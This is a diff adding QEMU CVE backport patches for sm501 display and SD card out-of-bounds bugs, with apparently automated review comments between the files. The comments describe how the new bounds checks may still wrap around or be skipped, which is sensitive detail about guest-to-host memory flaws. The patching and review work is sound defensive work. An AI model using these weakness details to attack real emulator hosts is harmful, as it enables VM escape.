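+Content-Transfer-Encoding: 8bit
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-id: 124bf5de8d7cf503b32b377d0445029a76bfbd49.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#3
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index f42d05e1e4..97660090bb 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -701,7 +701,7 @@ static void sm501_2d_operation(SM501State *s)
+ {
+ /* obtain operation parameters */
+ int cmd = (s->twoD_control >> 16) & 0x1F;
+- int rtl = s->twoD_control & 0x8000000;
++ int rtl = s->twoD_control & BIT(27);
+ int src_x = (s->twoD_source >> 16) & 0x01FFF;
+ int src_y = s->twoD_source & 0xFFFF;
+ int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+@@ -751,8 +751,7 @@ static void sm501_2d_operation(SM501State *s)
+ }
+ }
+
+- if ((s->twoD_source_base & 0x08000000) ||
+- (s->twoD_destination_base & 0x08000000)) {
++ if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) {
+ qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
+ return;
+ }
+--
+2.25.1
+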
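--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch
@@ -0,0 +1,100 @@
+From 3d0b096298b5579a7fa0753ad90968b27bc65372 Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 4/5] sm501: Clean up local variables in sm501_2d_operation
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Make variables local to the block they are used in to make it clearer
+which operation they are needed for.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-id: ae59f8138afe7f6a5a4a82539d0f61496a906b06.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#4
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 31 ++++++++++++++++---------------
+ 1 file changed, 16 insertions(+), 15 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index 97660090bb..5ed57703d8 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -699,28 +699,19 @@ static inline void hwc_invalidate(SM501State *s, int crt)
+
+ static void sm501_2d_operation(SM501State *s)
+ {
+- /* obtain operation parameters */
+ int cmd = (s->twoD_control >> 16) & 0x1F;
+ int rtl = s->twoD_control & BIT(27);
+- int src_x = (s->twoD_source >> 16) & 0x01FFF;
+- int src_y = s->twoD_source & 0xFFFF;
+- int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+- int dst_y = s->twoD_destination & 0xFFFF;
+- int width = (s->twoD_dimension >> 16) & 0x1FFF;
+- int height = s->twoD_dimension & 0xFFFF;
+- uint32_t color = s->twoD_foreground;
+ int format = (s->twoD_stretch >> 20) & 0x3;
+ int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */
+ /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
+ int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
+ int rop = s->twoD_control & 0xFF;
+- uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
++ int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
++ int dst_y = s->twoD_destination & 0xFFFF;
++ int width = (s->twoD_dimension >> 16) & 0x1FFF;
++ int height = s->twoD_dimension & 0xFFFF;
+ uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF;
+-
+- /* get frame buffer info */
+- uint8_t *src = s->local_mem + src_base;
+ uint8_t *dst = s->local_mem + dst_base;
+- int src_pitch = s->twoD_pitch & 0x1FFF;
+ int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
+ int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
+ int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+@@ -758,6 +749,13 @@ static void sm501_2d_operation(SM501State *s)
+
+ switch (cmd) {
+ case 0x00: /* copy area */
++ {
++ int src_x = (s->twoD_source >> 16) & 0x01FFF;
++ int src_y = s->twoD_source & 0xFFFF;
++ uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
++ uint8_t *src = s->local_mem + src_base;
++ int src_pitch = s->twoD_pitch & 0x1FFF;
++
+ #define COPY_AREA(_bpp, _pixel_type, rtl) { \
+ int y, x, index_d, index_s; \
+ for (y = 0; y < height; y++) { \
+@@ -793,8 +791,11 @@ static void sm501_2d_operation(SM501State *s)
+ break;
+ }
+ break;
+-
++ }
+ case 0x01: /* fill rectangle */
++ {
++ uint32_t color = s->twoD_foreground;
++
+ #define FILL_RECT(_bpp, _pixel_type) { \
+ int y, x; \
+ for (y = 0; y < height; y++) { \
+@@ -819,7 +820,7 @@ static void sm501_2d_operation(SM501State *s)
+ break;
+ }
+ break;
+-
++ }
+ default:
+ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
+ cmd);
+--
+2.25.1
+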
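--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch
@@ -0,0 +1,266 @@
+From b15a22bbcbe6a78dc3d88fe3134985e4cdd87de4 Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 5/5] sm501: Replace hand written implementation with pixman
+ where possible
+
+Besides being faster this should also prevent malicious guests to
+abuse 2D engine to overwrite data or cause a crash.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Message-id: 58666389b6cae256e4e972a32c05cf8aa51bffc0.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 207 ++++++++++++++++++++++++++-------------------
+ 1 file changed, 119 insertions(+), 88 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index 5ed57703d8..8bf4d111f4 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -706,13 +706,12 @@ static void sm501_2d_operation(SM501State *s)
+ /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
+ int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
+ int rop = s->twoD_control & 0xFF;
+- int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+- int dst_y = s->twoD_destination & 0xFFFF;
+- int width = (s->twoD_dimension >> 16) & 0x1FFF;
+- int height = s->twoD_dimension & 0xFFFF;
++ unsigned int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
++ unsigned int dst_y = s->twoD_destination & 0xFFFF;
++ unsigned int width = (s->twoD_dimension >> 16) & 0x1FFF;
++ unsigned int height = s->twoD_dimension & 0xFFFF;
+ uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF;
+- uint8_t *dst = s->local_mem + dst_base;
+- int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
++ unsigned int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
+ int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
+ int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+
+@@ -721,104 +720,136 @@ static void sm501_2d_operation(SM501State *s)
+ return;
+ }
+
+- if (rop_mode == 0) {
+- if (rop != 0xcc) {
+- /* Anything other than plain copies are not supported */
+- qemu_log_mask(LOG_UNIMP, "sm501: rop3 mode with rop %x is not "
+- "supported.\n", rop);
+- }
+- } else {
+- if (rop2_source_is_pattern && rop != 0x5) {
+- /* For pattern source, we support only inverse dest */
+- qemu_log_mask(LOG_UNIMP, "sm501: rop2 source being the pattern and "
+- "rop %x is not supported.\n", rop);
+- } else {
+- if (rop != 0x5 && rop != 0xc) {
+- /* Anything other than plain copies or inverse dest is not
+- * supported */
+- qemu_log_mask(LOG_UNIMP, "sm501: rop mode %x is not "
+- "supported.\n", rop);
+- }
+- }
+- }
+-
+ if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) {
+ qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
+ return;
+ }
+
++ if (!dst_pitch) {
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero dest pitch.\n");
++ return;
++ }
++
++ if (!width || !height) {
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero size 2D op.\n");
++ return;
++ }
++
++ if (rtl) {
++ dst_x -= width - 1;
++ dst_y -= height - 1;
++ }
++
++ if (dst_base >= get_local_mem_size(s) || dst_base +
++ (dst_x + width + (dst_y + height) * (dst_pitch + width)) *
++ (1 << format) >= get_local_mem_size(s)) {
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: 2D op dest is outside vram.\n");
++ return;
++ }
++
+ switch (cmd) {
+- case 0x00: /* copy area */
++ case 0: /* BitBlt */
+ {
+- int src_x = (s->twoD_source >> 16) & 0x01FFF;
+- int src_y = s->twoD_source & 0xFFFF;
++ unsigned int src_x = (s->twoD_source >> 16) & 0x01FFF;
++ unsigned int src_y = s->twoD_source & 0xFFFF;
+ uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
+- uint8_t *src = s->local_mem + src_base;
+- int src_pitch = s->twoD_pitch & 0x1FFF;
+-
+-#define COPY_AREA(_bpp, _pixel_type, rtl) { \
+- int y, x, index_d, index_s; \
+- for (y = 0; y < height; y++) { \
+- for (x = 0; x < width; x++) { \
+- _pixel_type val; \
+- \
+- if (rtl) { \
+- index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp; \
+- index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp; \
+- } else { \
+- index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp; \
+- index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
+- } \
+- if (rop_mode == 1 && rop == 5) { \
+- /* Invert dest */ \
+- val = ~*(_pixel_type *)&dst[index_d]; \
+- } else { \
+- val = *(_pixel_type *)&src[index_s]; \
+- } \
+- *(_pixel_type *)&dst[index_d] = val; \
+- } \
+- } \
+- }
+- switch (format) {
+- case 0:
+- COPY_AREA(1, uint8_t, rtl);
+- break;
+- case 1:
+- COPY_AREA(2, uint16_t, rtl);
+- break;
+- case 2:
+- COPY_AREA(4, uint32_t, rtl);
+- break;
++ unsigned int src_pitch = s->twoD_pitch & 0x1FFF;
++
++ if (!src_pitch) {
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero src pitch.\n");
++ return;
++ }
++
++ if (rtl) {
++ src_x -= width - 1;
++ src_y -= height - 1;
++ }
++
++ if (src_base >= get_local_mem_size(s) || src_base +
++ (src_x + width + (src_y + height) * (src_pitch + width)) *
++ (1 << format) >= get_local_mem_size(s)) {
++ qemu_log_mask(LOG_GUEST_ERROR,
++ "sm501: 2D op src is outside vram.\n");
++ return;
++ }
++
++ if ((rop_mode && rop == 0x5) || (!rop_mode && rop == 0x55)) {
++ /* Invert dest, is there a way to do this with pixman? */
++ unsigned int x, y, i;
++ uint8_t *d = s->local_mem + dst_base;
++
++ for (y = 0; y < height; y++) {
++ i = (dst_x + (dst_y + y) * dst_pitch) * (1 << format);
++ for (x = 0; x < width; x++, i += (1 << format)) {
++ switch (format) {
++ case 0:
++ d[i] = ~d[i];
++ break;
++ case 1:
++ *(uint16_t *)&d[i] = ~*(uint16_t *)&d[i];
++ break;
++ case 2:
++ *(uint32_t *)&d[i] = ~*(uint32_t *)&d[i];
++ break;
++ }
++ }
++ }
++ } else {
++ /* Do copy src for unimplemented ops, better than unpainted area */
++ if ((rop_mode && (rop != 0xc || rop2_source_is_pattern)) ||
++ (!rop_mode && rop != 0xcc)) {
++ qemu_log_mask(LOG_UNIMP,
++ "sm501: rop%d op %x%s not implemented\n",
++ (rop_mode ? 2 : 3), rop,
++ (rop2_source_is_pattern ?
++ " with pattern source" : ""));
++ }
++ /* Check for overlaps, this could be made more exact */
++ uint32_t sb, se, db, de;
++ sb = src_base + src_x + src_y * (width + src_pitch);
++ se = sb + width + height * (width + src_pitch);
++ db = dst_base + dst_x + dst_y * (width + dst_pitch);
++ de = db + width + height * (width + dst_pitch);
++ if (rtl && ((db >= sb && db <= se) || (de >= sb && de <= se))) {
++ /* regions may overlap: copy via temporary */
++ int llb = width * (1 << format);
++ int tmp_stride = DIV_ROUND_UP(llb, sizeof(uint32_t));
++ uint32_t *tmp = g_malloc(tmp_stride * sizeof(uint32_t) *
++ height);
++ pixman_blt((uint32_t *)&s->local_mem[src_base], tmp,
++ src_pitch * (1 << format) / sizeof(uint32_t),
++ tmp_stride, 8 * (1 << format), 8 * (1 << format),
++ src_x, src_y, 0, 0, width, height);
++ pixman_blt(tmp, (uint32_t *)&s->local_mem[dst_base],
++ tmp_stride,
++ dst_pitch * (1 << format) / sizeof(uint32_t),
++ 8 * (1 << format), 8 * (1 << format),
++ 0, 0, dst_x, dst_y, width, height);
++ g_free(tmp);
++ } else {
++ pixman_blt((uint32_t *)&s->local_mem[src_base],
++ (uint32_t *)&s->local_mem[dst_base],
++ src_pitch * (1 << format) / sizeof(uint32_t),
++ dst_pitch * (1 << format) / sizeof(uint32_t),
++ 8 * (1 << format), 8 * (1 << format),
++ src_x, src_y, dst_x, dst_y, width, height);
++ }
+ }
+ break;
+ }
+- case 0x01: /* fill rectangle */
++ case 1: /* Rectangle Fill */
+ {
+ uint32_t color = s->twoD_foreground;
+
+-#define FILL_RECT(_bpp, _pixel_type) { \
+- int y, x; \
+- for (y = 0; y < height; y++) { \
+- for (x = 0; x < width; x++) { \
+- int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
+- *(_pixel_type *)&dst[index] = (_pixel_type)color; \
+- } \
+- } \
+- }
+-
+- switch (format) {
+- case 0:
+- FILL_RECT(1, uint8_t);
+- break;
+- case 1:
+- color = cpu_to_le16(color);
+- FILL_RECT(2, uint16_t);
+- break;
+- case 2:
++ if (format == 2) {
+ color = cpu_to_le32(color);
+- FILL_RECT(4, uint32_t);
+- break;
++ } else if (format == 1) {
++ color = cpu_to_le16(color);
+ }
++
++ pixman_fill((uint32_t *)&s->local_mem[dst_base],
++ dst_pitch * (1 << format) / sizeof(uint32_t),
++ 8 * (1 << format), dst_x, dst_y, width, height, color);
+ break;
+ }
+ default:
+--
+2.25.1
+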
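Review bot: The new vram bounds checks in sm501_2d_operation are computed in 32-bit unsigned arithmetic, so an out-of-range request can wrap around instead of being rejected. With `rtl` set, `dst_x -= width - 1` and `dst_y -= height - 1` (and the `src_x`/`src_y` equivalents) underflow when the guest-supplied size exceeds the coordinate, and `(dst_y + height) * (dst_pitch + width) * (1 << format)` can exceed 32 bits at the top of the register ranges for the wider pixel formats, so the `>= get_local_mem_size(s)` comparison may pass for a region that is not inside vram. I would reject the underflow before adjusting, `if (rtl && (dst_x < width - 1 || dst_y < height - 1)) { qemu_log_mask(LOG_GUEST_ERROR, ...); return; }`, do the same for the source, and evaluate the extent in `uint64_t`. `format == 3` is also never rejected (the invert loop has no case for it) and the results of pixman_blt() and pixman_fill() are ignored, so an operation pixman refuses is silently dropped. The function starts before and continues after the hunks shown.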
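--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch
@@ -0,0 +1,50 @@
+From 6dd3a164f5b31c703c7d8372841ad3bd6a57de6d Mon Sep 17 00:00:00 2001
+From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Tue, 5 Jun 2018 22:28:51 -0300
+Subject: [PATCH 1/1] hw/sd/sdcard: Simplify realize() a bit
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+We don't need to check if sd->blk is set twice.
+
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Message-Id: <20200630133912.9428-18-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;f=hw/sd/sd.c;h=6dd3a164f5b31c703c7d8372841ad3bd6a57de6d
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 10 +++++-----
+ 1 file changed, 5 insertions(+), 5 deletions(-)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index 1cc16bf..edd60a0 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -2105,12 +2105,12 @@ static void sd_realize(DeviceState *dev, Error **errp)
+ return;
+ }
+
+- if (sd->blk && blk_is_read_only(sd->blk)) {
+- error_setg(errp, "Cannot use read-only drive as SD card");
+- return;
+- }
+-
+ if (sd->blk) {
++ if (blk_is_read_only(sd->blk)) {
++ error_setg(errp, "Cannot use read-only drive as SD card");
++ return;
++ }
++
+ ret = blk_set_perm(sd->blk, BLK_PERM_CONSISTENT_READ | BLK_PERM_WRITE,
+ BLK_PERM_ALL, errp);
+ if (ret < 0) {
+--
+1.8.3.1
+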
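Review bot: The provenance tag in this patch header is misspelled as `Upstram-Status: Backport:` (patch line 16), so anything that scans CVE patches for an `Upstream-Status:` line will treat the patch as untagged; CVE-2020-13253_2.patch and CVE-2020-13253_3.patch repeat the same spelling. The 9pfs patch earlier on this page uses the form `Upstream-Status: Backport [<upstream commit URL>]`, and the URL needed is already on the following line here. Fixing the tag in all three files keeps the link between the fix and its upstream commit machine-checkable. The C change itself only moves the read-only test inside the existing `if (sd->blk)` block and needs no comment.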
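--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch
@@ -0,0 +1,112 @@
+From a9bcedd15a5834ca9ae6c3a97933e85ac7edbd36 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Tue, 7 Jul 2020 13:02:34 +0200
+Subject: [PATCH] hw/sd/sdcard: Do not allow invalid SD card sizes
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+QEMU allows to create SD card with unrealistic sizes. This could
+work, but some guests (at least Linux) consider sizes that are not
+a power of 2 as a firmware bug and fix the card size to the next
+power of 2.
+
+While the possibility to use small SD card images has been seen as
+a feature, it became a bug with CVE-2020-13253, where the guest is
+able to do OOB read/write accesses past the image size end.
+
+In a pair of commits we will fix CVE-2020-13253 as:
+
+ Read command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+ occurred and no data transfer is performed.
+
+ Write command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+ occurred and no data transfer is performed.
+
+ WP_VIOLATION errors are not modified: the error bit is set, we
+ stay in receive-data state, wait for a stop command. All further
+ data transfer is ignored. See the check on sd->card_status at the
+ beginning of sd_read_data() and sd_write_data().
+
+While this is the correct behavior, in case QEMU create smaller SD
+cards, guests still try to access past the image size end, and QEMU
+considers this is an invalid address, thus "all further data transfer
+is ignored". This is wrong and make the guest looping until
+eventually timeouts.
+
+Fix by not allowing invalid SD card sizes (suggesting the expected
+size as a hint):
+
+ $ qemu-system-arm -M orangepi-pc -drive file=rootfs.ext2,if=sd,format=raw
+ qemu-system-arm: Invalid SD card size: 60 MiB
+ SD card size has to be a power of 2, e.g. 64 MiB.
+ You can resize disk images with 'qemu-img resize <imagefile> <new-size>'
+ (note that this will lose data if you make the image smaller than it currently is).
+
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Message-Id: <20200713183209.26308-8-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;h=a9bcedd15a5834ca9ae6c3a97933e85ac7edbd36
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 25 +++++++++++++++++++++++++
+ 1 file changed, 25 insertions(+)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index edd60a09c0..76d68359a4 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -32,6 +32,7 @@
+
+ #include "qemu/osdep.h"
+ #include "qemu/units.h"
++#include "qemu/cutils.h"
+ #include "hw/irq.h"
+ #include "hw/registerfields.h"
+ #include "sysemu/block-backend.h"
+@@ -2106,11 +2107,35 @@ static void sd_realize(DeviceState *dev, Error **errp)
+ }
+
+ if (sd->blk) {
++ int64_t blk_size;
++
+ if (blk_is_read_only(sd->blk)) {
+ error_setg(errp, "Cannot use read-only drive as SD card");
+ return;
+ }
+
++ blk_size = blk_getlength(sd->blk);
++ if (blk_size > 0 && !is_power_of_2(blk_size)) {
++ int64_t blk_size_aligned = pow2ceil(blk_size);
++ char *blk_size_str;
++
++ blk_size_str = size_to_str(blk_size);
++ error_setg(errp, "Invalid SD card size: %s", blk_size_str);
++ g_free(blk_size_str);
++
++ blk_size_str = size_to_str(blk_size_aligned);
++ error_append_hint(errp,
++ "SD card size has to be a power of 2, e.g. %s.\n"
++ "You can resize disk images with"
++ " 'qemu-img resize <imagefile> <new-size>'\n"
++ "(note that this will lose data if you make the"
++ " image smaller than it currently is).\n",
++ blk_size_str);
++ g_free(blk_size_str);
++
++ return;
++ }
++
+ ret = blk_set_perm(sd->blk, BLK_PERM_CONSISTENT_READ | BLK_PERM_WRITE,
+ BLK_PERM_ALL, errp);
+ if (ret < 0) {
+--
+2.32.0
+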
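Review bot: A failed blk_getlength() is not handled by the new size check in sd_realize: the call returns a negative value on error, and `blk_size > 0 && !is_power_of_2(blk_size)` then skips validation, so realize carries on with no diagnostic and the card size is never vetted. Report the failure before the power-of-2 test, for example `if (blk_size < 0) { error_setg_errno(errp, -blk_size, "Cannot get SD card size"); return; }`. A zero-length image also passes this condition; whether that is intended cannot be told from the hunk. Since this check is what keeps guest accesses within the backing image, it should fail closed when the length is unknown. sd_realize begins before and continues after the lines shown.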
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch
new file mode 100644
index 0000000000..b512b2bd7f
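--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch
@@ -0,0 +1,86 @@
+From 794d68de2f021a6d3874df41d6bbe8590ec05207 Mon Sep 17 00:00:00 2001
+From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Mon, 13 Jul 2020 09:27:35 +0200
+Subject: [PATCH] hw/sd/sdcard: Update coding style to make checkpatch.pl happy
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+To make the next commit easier to review, clean this code first.
+
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Reviewed-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20200630133912.9428-3-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;f=hw/sd/sd.c;h=794d68de2f021a6d3874df41d6bbe8590ec05207
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+--- a/hw/sd/sd.c (revision b0ca999a43a22b38158a222233d3f5881648bb4f)
++++ b/hw/sd/sd.c (date 1647514442924)
+@@ -1154,8 +1154,9 @@
+ sd->data_start = addr;
+ sd->data_offset = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size)
++ if (sd->data_start + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
++ }
+ return sd_r1;
+
+ default:
+@@ -1170,8 +1171,9 @@
+ sd->data_start = addr;
+ sd->data_offset = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size)
++ if (sd->data_start + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
++ }
+ return sd_r1;
+
+ default:
+@@ -1216,12 +1218,15 @@
+ sd->data_offset = 0;
+ sd->blk_written = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size)
++ if (sd->data_start + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
+- if (sd_wp_addr(sd, sd->data_start))
++ }
++ if (sd_wp_addr(sd, sd->data_start)) {
+ sd->card_status |= WP_VIOLATION;
+- if (sd->csd[14] & 0x30)
++ }
++ if (sd->csd[14] & 0x30) {
+ sd->card_status |= WP_VIOLATION;
++ }
+ return sd_r1;
+
+ default:
+@@ -1240,12 +1245,15 @@
+ sd->data_offset = 0;
+ sd->blk_written = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size)
++ if (sd->data_start + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
+- if (sd_wp_addr(sd, sd->data_start))
++ }
++ if (sd_wp_addr(sd, sd->data_start)) {
+ sd->card_status |= WP_VIOLATION;
+- if (sd->csd[14] & 0x30)
++ }
++ if (sd->csd[14] & 0x30) {
+ sd->card_status |= WP_VIOLATION;
++ }
+ return sd_r1;
+
+ default: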
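Review bot: The status tag in this patch header is spelled `Upstram-Status: Backport:`, while the CVE-2020-13754 and CVE-2020-15469 patches added by the same commit use `Upstream-Status: Backport`. A misspelled tag will presumably not be recognised by anything that reads the patch status, so the provenance of this CVE backport is lost to tooling; it should read `Upstream-Status: Backport` followed by the upstream commit URL already given in the header. The same spelling appears in CVE-2020-13253_4.patch and CVE-2020-13253_5.patch. The inner diff header also carries `(revision …)` and `(date …)` suffixes instead of an `index` line, which suggests the hunks were regenerated locally, so they are worth comparing against the upstream commit.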
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch
new file mode 100644
index 0000000000..6b4c1ec050
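--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch
@@ -0,0 +1,139 @@
+From 790762e5487114341cccc5bffcec4cb3c022c3cd Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Thu, 4 Jun 2020 19:22:29 +0200
+Subject: [PATCH] hw/sd/sdcard: Do not switch to ReceivingData if address is
+ invalid
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Only move the state machine to ReceivingData if there is no
+pending error. This avoids later OOB access while processing
+commands queued.
+
+ "SD Specifications Part 1 Physical Layer Simplified Spec. v3.01"
+
+ 4.3.3 Data Read
+
+ Read command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+ occurred and no data transfer is performed.
+
+ 4.3.4 Data Write
+
+ Write command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+ occurred and no data transfer is performed.
+
+WP_VIOLATION errors are not modified: the error bit is set, we
+stay in receive-data state, wait for a stop command. All further
+data transfer is ignored. See the check on sd->card_status at the
+beginning of sd_read_data() and sd_write_data().
+
+Fixes: CVE-2020-13253
+
+Cc: qemu-stable@nongnu.org
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Buglink: https://bugs.launchpad.net/qemu/+bug/1880822
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Message-Id: <20200630133912.9428-6-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;h=790762e5487114341cccc5bffcec4cb3c022c3cd
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 38 ++++++++++++++++++++++++--------------
+ 1 file changed, 24 insertions(+), 14 deletions(-)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index f4f76f8fd2..fad9cf1ee7 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -1171,13 +1171,15 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ case 17: /* CMD17: READ_SINGLE_BLOCK */
+ switch (sd->state) {
+ case sd_transfer_state:
+- sd->state = sd_sendingdata_state;
+- sd->data_start = addr;
+- sd->data_offset = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size) {
++ if (addr + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
++ return sd_r1;
+ }
++
++ sd->state = sd_sendingdata_state;
++ sd->data_start = addr;
++ sd->data_offset = 0;
+ return sd_r1;
+
+ default:
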